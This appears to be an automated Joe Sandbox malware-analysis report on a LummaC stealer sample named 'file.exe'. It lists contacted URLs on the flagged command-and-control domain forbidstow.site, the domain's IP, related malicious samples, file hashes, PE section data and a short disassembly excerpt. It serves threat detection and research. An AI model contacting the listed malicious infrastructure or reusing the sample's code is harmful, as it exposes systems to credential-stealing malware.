                                                https://forbidstow.site/pifile.exe, 00000003.00000002.2192897295.000000000139C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.2192697514.0000000001316000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000003.00000003.2132206149.0000000003985000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://forbidstow.site/zofile.exe, 00000003.00000003.2147992648.000000000138D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://ac.ecosia.org/autocomplete?q=file.exe, 00000003.00000003.2102801748.000000000389B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102843367.0000000003898000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102957593.0000000003898000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://forbidstow.site:443/apifile.exe, 00000003.00000003.2117769016.0000000003865000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2117686465.000000000386C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://forbidstow.site/apiDwfile.exe, 00000003.00000003.2172599012.0000000001395000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://forbidstow.site/piDwfile.exe, 00000003.00000002.2192897295.000000000139C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgfile.exe, 00000003.00000003.2148108007.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.2147992648.000000000138D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000003.00000003.2148108007.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.2147992648.000000000138D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://x1.c.lencr.org/0file.exe, 00000003.00000003.2131010744.000000000388F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://x1.i.lencr.org/0file.exe, 00000003.00000003.2131010744.000000000388F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000003.00000003.2102801748.000000000389B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102843367.0000000003898000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102957593.0000000003898000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://forbidstow.site/twfile.exe, 00000003.00000003.2172599012.0000000001395000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000003.00000003.2131010744.000000000388F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&reffile.exe, 00000003.00000003.2148108007.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.2147992648.000000000138D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477file.exe, 00000003.00000003.2148108007.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.2147992648.000000000138D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://forbidstow.site/file.exe, 00000003.00000003.2165424961.00000000013B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000003.00000003.2132206149.0000000003985000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000003.00000003.2102801748.000000000389B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102843367.0000000003898000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.2102957593.0000000003898000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://forbidstow.site/efile.exe, 00000003.00000002.2192897295.000000000139C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.2172599012.0000000001395000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://forbidstow.site/cfile.exe, 00000003.00000003.2130598412.000000000138D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs
                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    104.21.41.39
                                                                    forbidstow.siteUnited States
                                                                    13335CLOUDFLARENETUStrue
                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1545731
                                                                    Start date and time:2024-10-30 22:22:04 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 5m 3s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:10
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:file.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@5/5@1/1
                                                                    EGA Information:
                                                                    • Successful, ratio: 100%
                                                                    HCA Information:
                                                                    • Successful, ratio: 98%
                                                                    • Number of executed functions: 48
                                                                    • Number of non-executed functions: 165
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 20.189.173.21
                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    • VT rate limit hit for: file.exe
                                                                    TimeTypeDescription
                                                                    17:22:58API Interceptor8x Sleep call for process: file.exe modified
                                                                    17:23:17API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    104.21.41.39DHr3CzaX5d.exeGet hashmaliciousLummaCBrowse
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      forbidstow.siteSetup.exeGet hashmaliciousLummaCBrowse
                                                                      • 172.67.142.84
                                                                      4RNoaB1aYY.exeGet hashmaliciousLummaCBrowse
                                                                      • 172.67.142.84
                                                                      DHr3CzaX5d.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.41.39
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                      • 188.114.96.3
                                                                      Paiement.emlGet hashmaliciousHTMLPhisherBrowse
                                                                      • 104.18.95.41
                                                                      PO 4500580954.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                      • 188.114.96.3
                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                      • 188.114.96.3
                                                                      https://pub-6838e3dd185d4df89d3bb3eabe6469a4.r2.dev/index.html#Get hashmaliciousUnknownBrowse
                                                                      • 104.21.48.111
                                                                      SecuriteInfo.com.Trojan.PWS.Lumma.749.8914.14992.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.33.140
                                                                      https:/click.mailchimp.com/track/click/30010842/docsend.com?p=eyJzIjoiT2RaN0hwNHlyY2E3VXl5TWcwMlA2eFpHVlN3IiwidiI6MSwicCI6IntcInVcIjozMDAxMDg0MixcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2RvY3NlbmQuY29tXFxcL3ZpZXdcXFwvZzZnYzZjazdtNHlkYTRpa1wiLFwiaWRcIjpcImNhZDg3NzI1Y2UzMjRiMzI4Yzk1ZGVkYWUyMzc4ZTZjXCIsXCJ1cmxfaWRzXCI6W1wiYzE5ZWU5NGJiMzA5YmZhOGQ2MDU3OGI1Mjk5NTFmOWE4NDQ0ODNhYVwiXX0ifQ#steven.davis@tu.eduGet hashmaliciousHTMLPhisherBrowse
                                                                      • 104.17.25.14
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 188.114.96.3
                                                                      https://share.hsforms.com/11zbkP7dfTBO0LgTS5dCN0Asixz3Get hashmaliciousMamba2FABrowse
                                                                      • 104.16.117.116
                                                                      Access Audits -System #6878.msgGet hashmaliciousHTMLPhisherBrowse
                                                                      • 188.114.96.3
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                      • 104.21.41.39
                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                      • 104.21.41.39
                                                                      SecuriteInfo.com.Trojan.PWS.Lumma.749.8914.14992.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.41.39
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.41.39
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.41.39
                                                                      819614 - Midways Freight Ltd.xlsmGet hashmaliciousUnknownBrowse
                                                                      • 104.21.41.39
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.41.39
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.41.39
                                                                      weekly-finances-report.xlsxGet hashmaliciousKnowBe4Browse
                                                                      • 104.21.41.39
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.41.39
                                                                      No context
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):65536
                                                                      Entropy (8bit):0.6478058007756035
                                                                      Encrypted:false
                                                                      SSDEEP:192:jKkXzqvePa0BU/7E3jhzuiFkZ24IO8khB:+eZBU/AjhzuiFkY4IO8+
                                                                      MD5:4000A761F4BFCD916040DF9F7ADA97EA
                                                                      SHA1:798F2BD830B8CF60CCC02BFA1E118F79F0FB5FDA
                                                                      SHA-256:02253DBD665D6210EB036FB94E7F0F548FD070759C4AC3277509F4A4A702D7B1
                                                                      SHA-512:E51F33BBB3D240E9E47D78F0673F2C6C1BC151C11BF441FE24445F5554A0F9EFB90CD94FFEE98273413E72A457FFF583C1168595300263544A0236BB5A421DD3
                                                                      Malicious:true
                                                                      Reputation:low
                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.7.9.6.9.7.7.6.2.8.6.9.9.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.7.9.6.9.7.7.9.2.5.5.7.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.1.8.f.f.2.7.9.-.4.8.0.d.-.4.9.1.c.-.a.9.9.d.-.8.f.6.7.a.e.4.6.0.5.0.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.9.e.a.1.4.a.e.-.6.b.d.6.-.4.d.5.8.-.b.0.6.a.-.d.0.6.a.3.a.6.d.f.0.7.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.d.4.-.0.0.0.1.-.0.0.1.4.-.e.9.f.c.-.a.3.e.1.1.1.2.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.4.d.3.2.0.5.a.f.0.b.b.4.d.0.2.9.c.3.4.2.1.b.e.1.e.e.b.c.e.7.2.7.1.9.6.6.b.4.c.5.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.3.0.:.
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Mini DuMP crash report, 14 streams, Wed Oct 30 21:22:57 2024, 0x1205a4 type
                                                                      Category:dropped
                                                                      Size (bytes):34100
                                                                      Entropy (8bit):1.6473534728426835
                                                                      Encrypted:false
                                                                      SSDEEP:96:5w8t5kY8MZvHCnti77Tvvm4XNKOIiGfrOM9l0mCfrWIkWIfJ6C03Ip5f4gP5:lGtOzXNqb9lRAUj0s5f4gP5
                                                                      MD5:069A229C2C0E72F798866B9F704DD43A
                                                                      SHA1:2C37065CF62906BFC4AE02428B8EE4016447EA2F
                                                                      SHA-256:C76DD137C8BAE7D12D2BD095B963EF3022B727AA6F3D88B85290BAC15C840E61
                                                                      SHA-512:3AC64A28A2349EF279B955EC19128D9B71498F6D2774197DF6325EB3C6F56425CB447C95F8908EEB52B6F6788219B7815815226FCDD417E290C72B0C956E6DBE
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:MDMP..a..... ........."g........................d...........................T.......8...........T................z......................................................................................................eJ..............GenuineIntel............T............."g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):8382
                                                                      Entropy (8bit):3.6948861806593953
                                                                      Encrypted:false
                                                                      SSDEEP:192:R6l7wVeJACo6zX6YEIiSU9RBu+rgmf6Vdpr+89bN2sf7vm:R6lXJ46j6YENSU9Xu+rgmf03NVf6
                                                                      MD5:1550369C1C16407B3032190B37971071
                                                                      SHA1:1A4271E63262EC951F905B3B1FE43C1D9D5E629F
                                                                      SHA-256:0C5E4A220E2704C36E5D47BC1A4A224093D7A95943E65D0E542CF40FC76222E3
                                                                      SHA-512:B0C290323B68334E54D7C03A882056C84A7C582F137841EA4EE628E91BE70559061C2E51F90ED780F36530C8E14D8FC874A81B5F3344A6E72D232DAA09314817
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.1.6.<./.P.i.
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4690
                                                                      Entropy (8bit):4.453825159955369
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwWl8zscJg77aI9aCgWpW8VY18vYm8M4JirJFEs+q8vPrYM2nMhQd:uIjfaI7YCZ7VEfJoK32nMhQd
                                                                      MD5:2C21F4772467540D8256A5039004267C
                                                                      SHA1:CD4D976112DA9D3B8B116704FB7F14E3CC60BB4A
                                                                      SHA-256:88DD1782952E632CAC8EF95982C8AD3C73E4A58B19F832C103DBE9ED8DC7CCF2
                                                                      SHA-512:4B630BCDDA736939CD96C31E9866FF94E89FD6C5ADF866F44DA08251B56F157E0EB689C6C2090D2FEE9132A08C7C57968626863AF05EA38BF2CCEF2B1606D03D
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="566665" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                      Category:dropped
                                                                      Size (bytes):1835008
                                                                      Entropy (8bit):4.421341449581403
                                                                      Encrypted:false
                                                                      SSDEEP:6144:xSvfpi6ceLP/9skLmb0OT5WSPHaJG8nAgeMZMMhA2fX4WABlEnN20uhiTw:IvloT5W+EZMM6DFy403w
                                                                      MD5:E21A60C52522443394DA4BDFA7DA7637
                                                                      SHA1:01E46D3B69B63E3E5DEB8BDED999D3BB7AFF6BC6
                                                                      SHA-256:FE3B1D6D68F0B3BE42D1025FC5C5FF7CBBEB497971E9890ADD773CB06893DCE7
                                                                      SHA-512:20C02C04253CBFBB947C286A9221352940DC1FB80103C105DA0D9F9134B3DF1BE1B2E7141F55FD18ACE5543C61A8BBA9967587D83237C48A7ACF37AA60B50518
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm&&...+..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                      Entropy (8bit):7.641256817521413
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:file.exe
                                                                      File size:665'088 bytes
                                                                      MD5:998c59d4bf9c18e798a6db77f7ce10f9
                                                                      SHA1:4d3205af0bb4d029c3421be1eebce7271966b4c5
                                                                      SHA256:e0d3da58a38b98b5d9ba1241fb1b30d7251332883b285117e6d2794af0c66394
                                                                      SHA512:22c7faba3d3ec631af044ac63a0deab1ca520a1d826a95becc8466183651215f0a9c1cb9e03e9edd42ce5dfb00f48f9b26cce4397c0edf0264bf311f81eee330
                                                                      SSDEEP:12288:3KbQTjM37Fhgr4ZNkE1Er41iaNhqqitQ+jHKVkdvXPg9O/1ACWFtIW5NcDU:nTY37wr4ZyprDGqqitSkxPg41XgtR5Wo
                                                                      TLSH:F1E4E001F4C3A0B3E16314300725D6775A3DF9214F259DFFA3E49A7A8A747C19632BAA
                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....n"g............................B.............@.......................................@.....................................(..
                                                                      Icon Hash:00928e8e8686b000
                                                                      Entrypoint:0x421c42
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows cui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x67226EE6 [Wed Oct 30 17:37:42 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:6
                                                                      OS Version Minor:0
                                                                      File Version Major:6
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:6
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:6ec4262994a6b10076d58ba7d08c6aff
                                                                      Instruction
                                                                      call 00007F9C287C8ECAh
                                                                      jmp 00007F9C287C8D39h
                                                                      mov ecx, dword ptr [0044E834h]
                                                                      push esi
                                                                      push edi
                                                                      mov edi, BB40E64Eh
                                                                      mov esi, FFFF0000h
                                                                      cmp ecx, edi
                                                                      je 00007F9C287C8EC6h
                                                                      test esi, ecx
                                                                      jne 00007F9C287C8EE8h
                                                                      call 00007F9C287C8EF1h
                                                                      mov ecx, eax
                                                                      cmp ecx, edi
                                                                      jne 00007F9C287C8EC9h
                                                                      mov ecx, BB40E64Fh
                                                                      jmp 00007F9C287C8ED0h
                                                                      test esi, ecx
                                                                      jne 00007F9C287C8ECCh
                                                                      or eax, 00004711h
                                                                      shl eax, 10h
                                                                      or ecx, eax
                                                                      mov dword ptr [0044E834h], ecx
                                                                      not ecx
                                                                      pop edi
                                                                      mov dword ptr [0044E830h], ecx
                                                                      pop esi
                                                                      ret
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      sub esp, 14h
                                                                      and dword ptr [ebp-0Ch], 00000000h
                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                      and dword ptr [ebp-08h], 00000000h
                                                                      push eax
                                                                      call dword ptr [0044C5FCh]
                                                                      mov eax, dword ptr [ebp-08h]
                                                                      xor eax, dword ptr [ebp-0Ch]
                                                                      mov dword ptr [ebp-04h], eax
                                                                      call dword ptr [0044C5BCh]
                                                                      xor dword ptr [ebp-04h], eax
                                                                      call dword ptr [0044C5B8h]
                                                                      xor dword ptr [ebp-04h], eax
                                                                      lea eax, dword ptr [ebp-14h]
                                                                      push eax
                                                                      call dword ptr [0044C648h]
                                                                      mov eax, dword ptr [ebp-10h]
                                                                      lea ecx, dword ptr [ebp-04h]
                                                                      xor eax, dword ptr [ebp-14h]
                                                                      xor eax, dword ptr [ebp-04h]
                                                                      xor eax, ecx
                                                                      leave
                                                                      ret
                                                                      mov eax, 00004000h
                                                                      ret
                                                                      push 004509D0h
                                                                      call dword ptr [0044C620h]
                                                                      ret
                                                                      push 00030000h
                                                                      push 00010000h
                                                                      push 00000000h
                                                                      call 00007F9C287D0A11h
                                                                      add esp, 0Ch
                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x4c3e80x28.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x540000x206c.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x485600x18.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x40f780xc0.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x4c55c0x14c.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x3ec7f0x3ee003ec499fb020b3b6d0628f076a8a8d15eFalse0.5954196694831014data7.0240622903518135IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x400000xd8a40xda006a9fa68ef5aa4094efc6bd64fbfa1618False0.5083142201834863data5.532774870082355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0x4e0000x319c0x1600b467bb18dd2a08b668ebd6c810faf4deFalse0.40873579545454547data4.767256839156854IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .00cfg0x520000x80x2001e206a9823b5c531f4426ddab108bd65False0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .tls0x530000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .reloc0x540000x206c0x2200671458cc50ff55f86bfb89ed67251de5False0.7289751838235294data6.43539933061298IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                      .bss0x570000x51c000x51c00ff713db17f3ac5e33b4d86df1990eb2cFalse1.0003314936926606data7.999515451399284IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      DLLImport
